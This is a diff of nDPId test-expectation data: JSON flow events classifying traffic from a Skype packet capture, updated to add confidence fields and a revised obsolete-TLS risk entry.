 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969673443,"flow_last_seen":1431969701528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50055,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969677975,"flow_last_seen":1431969704363,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58458,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00615{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969695483,"flow_last_seen":1431969723584,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50086,"dst_port":40023,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969695483,"flow_last_seen":1431969723584,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50086,"dst_port":40023,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969695483,"flow_last_seen":1431969723584,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50086,"dst_port":40023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969704663,"flow_last_seen":1431969718237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50096,"dst_port":40027,"l4_proto":"tcp","ndpi": {"proto":"Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969704663,"flow_last_seen":1431969718237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50096,"dst_port":40027,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969704663,"flow_last_seen":1431969718237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50096,"dst_port":40027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642244,"flow_last_seen":1431969668794,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54396,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":56886,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":56886,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969725833,"flow_last_seen":1431969741920,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50132,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969725833,"flow_last_seen":1431969741920,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50132,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00601{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969727446,"flow_last_seen":1431969727738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50133,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969727446,"flow_last_seen":1431969727738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50133,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969727446,"flow_last_seen":1431969727738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50133,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":387,"flow_first_seen":1431969642444,"flow_last_seen":1431969808620,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":172532,"flow_avg_l4_payload_len":445,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969713813,"flow_last_seen":1431969733946,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.185.207.12","src_port":13021,"dst_port":45493,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969759543,"flow_last_seen":1431969759588,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.253.48.245","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NTP.Apple","breed":"Safe","category":"System"}}
-00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969642334,"flow_last_seen":1431969642400,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00591{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969792778,"flow_last_seen":1431969803795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50146,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":387,"flow_first_seen":1431969642444,"flow_last_seen":1431969808620,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":172532,"flow_avg_l4_payload_len":445,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969713813,"flow_last_seen":1431969733946,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.185.207.12","src_port":13021,"dst_port":45493,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969759543,"flow_last_seen":1431969759588,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.253.48.245","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}}
+00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969642334,"flow_last_seen":1431969642400,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969792778,"flow_last_seen":1431969803795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50146,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969792778,"flow_last_seen":1431969803795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.51","src_port":50146,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.26","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.21","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.41","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
